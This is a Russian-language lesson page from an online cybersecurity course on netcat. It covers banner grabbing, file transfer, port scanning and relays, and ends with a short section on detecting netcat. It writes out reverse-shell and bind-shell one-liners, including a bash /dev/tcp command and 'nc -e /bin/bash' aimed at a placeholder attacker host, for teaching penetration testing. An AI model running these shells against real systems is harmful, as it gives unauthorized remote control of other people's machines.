Netcat: швейцарский армейский нож
Используйте nc для получения баннеров, передачи файлов, перенаправления портов и простых обратных оболочек.
«Netcat: швейцарский армейский нож» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Что такое Неткат
Неткат (nc) — это утилита, которая читает и записывает данные через сетевые соединения TCP или UDP. Она установлена почти в каждой системе Юникс и незаменима для отладки, передачи файлов и базовой эксплуатации.
Установка соединения и получение баннера
Подключитесь к любому порту TCP, чтобы получить баннер службы и вручную взаимодействовать с протоколом. Это простейшая форма разведки.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPПрослушивание порта
Неткат может прослушивать входящие соединения с помощью -l -p. Это полезно для проверки соединения, перехвата обратных оболочек и приёма файлов.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberПередача файлов с помощью Нетката
Неткат может отправлять файлы, передавая их через конвейер в соединение. Получатель прослушивает соединение и перенаправляет вывод в файл. Шифрование отсутствует — используйте этот способ только в доверенных сетях.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtСканирование портов с помощью Нетката
Неткат поддерживает базовое сканирование портов с помощью -z (режим без ввода-вывода) и -w (время ожидания). Он работает медленнее Нмап, но полезен, когда Нмап недоступен.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Простая обратная оболочка
Обратная оболочка заставляет цель подключиться обратно к злоумышленнику. Это полезно при тестах на проникновение, когда правила межсетевого экрана блокируют входящие соединения к цели.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashОболочка с прослушиванием порта
Оболочка с прослушиванием порта ожидает соединения на целевой машине. Злоумышленник подключается к ней. В современных тестах на проникновение такой вариант встречается реже, поскольку межсетевые экраны обычно блокируют входящие соединения.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555Режим UDP
Используйте -u для соединений UDP. Это полезно при проверке служб UDP, таких как DNS (порт 53) и SNMP (порт 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Проксирование с помощью Нетката
Неткат может объединять соединения в цепочку, обеспечивая переход через сети. В сочетании с именованными каналами (mkfifo) он создаёт простые двусторонние туннели без дополнительных инструментов.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeНкат: современная альтернатива
Нкат (часть Нмап) расширяет возможности Нетката поддержкой SSL (--ssl), контролем доступа и режимом посредника. Для зашифрованных каналов предпочтительно использовать Нкат.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Защитникам: обнаружение Нетката
Соединения Нетката выглядят как обычные соединения TCP. Защитники обнаруживают его с помощью мониторинга имён процессов (HIDS), выявления необычных исходящих портов и обнаружения оболочки, запущенной неожиданным родительским процессом.
Быстрая проверка
Какой параметр Нетката включает режим прослушивания?
Итоги: Неткат
Неткат — фундаментальный инструмент: используйте его для получения баннеров, передачи файлов, проверки соединений и понимания принципов работы обратных оболочек и оболочек с прослушиванием порта. В разрешённых тестах на проникновение он помогает проверять правила межсетевого экрана и моделировать перемещение злоумышленника по сети. Хорошо изучите его — чтобы и использовать, и обнаруживать его.
Часто задаваемые вопросы
Урок «Netcat: швейцарский армейский нож» бесплатный?
Да — полный текст урока «Netcat: швейцарский армейский нож» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Netcat: швейцарский армейский нож»?
Используйте nc для получения баннеров, передачи файлов, перенаправления портов и простых обратных оболочек. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.
Сколько времени занимает урок «Netcat: швейцарский армейский нож»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Методы сканирования портов Nmap
- Определение сервисов и операционных систем
- Netcat: швейцарский армейский нож
- Скрипты перечисления сети